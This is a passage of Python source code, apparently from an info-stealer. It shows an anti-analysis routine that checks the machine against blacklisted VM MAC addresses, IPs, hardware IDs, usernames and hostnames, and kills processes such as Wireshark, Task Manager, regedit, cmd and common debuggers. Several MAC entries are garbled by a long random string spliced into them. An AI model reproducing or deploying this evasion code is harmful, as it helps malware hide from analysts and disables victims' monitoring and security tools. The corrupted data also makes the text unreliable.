'90:4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV', '00:50:56:97:a1:f8', '5e:86:e4:3d:0d:f6', '00:50:56:b3:ea:ee', '3e:53:81:b7:01:13', '00:50:56:97:ec:f2', '00:e0:4c:b3:5a:2a', '12:f8:87:ab:13:ec', '00:50:56:a0:38:06', '2e:62:e8:4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV', '00:50:56:a0:06:8d', '00:e0:4c:cb:62:08', '4e:81:81:8e:22:4e'] self.blacklistedProcesses = ["httpdebuggerui", "wireshark", "fiddler", "regedit", "cmd", "taskmgr", "vboxservice", "df5serv", "processhacker", "vboxtray", "vmtoolsd", "vmwaretray", "ida64", "ollydbg", "pestudio", "vmwareuser", "vgauthservice", "vmacthlp", "x96dbg", "vmsrvc", "x32dbg", "vmusrvc", "prl_cc", "prl_tools", "xenservice", "qemu-ga", "joeboxcontrol", "ksdumperclient", "ksdumper", "joeboxserver"] self.check_process() if self.get_network(): debugging = True if self.get_system(): debugging = True return debugging def check_process(self): for proc in psutil.process_iter(): if any(procstr in proc.name().lower() for procstr in self.blacklistedProcesses): try: proc.kill() except (psutil.NoSuchProcess, psutil.AccessDenied): pass def get_network(self): ip = requests.get('https://api.ipify.org').text mac = ':'.join(re.findall('..', '%012x' % uuid.getnode())) if ip in self.blackListedIPS: return True if mac in self.blackListedMacs: return True def get_system(self): hwid = (subprocess.Popen("wmic csproduct get uuid", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout.read() + subprocess.Popen("wmic csproduct get uuid", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stderr.read()).decode().split("\n")[1] username = os.getenv("UserName") hostname = os.getenv("COMPUTERNAME") if hwid in self.blackListedHWIDS: return True if username in self.blackListedUsers: return True if hostname in self.blackListedPCNames: return True def self_destruct(self): sys.exit() try: main() except: pass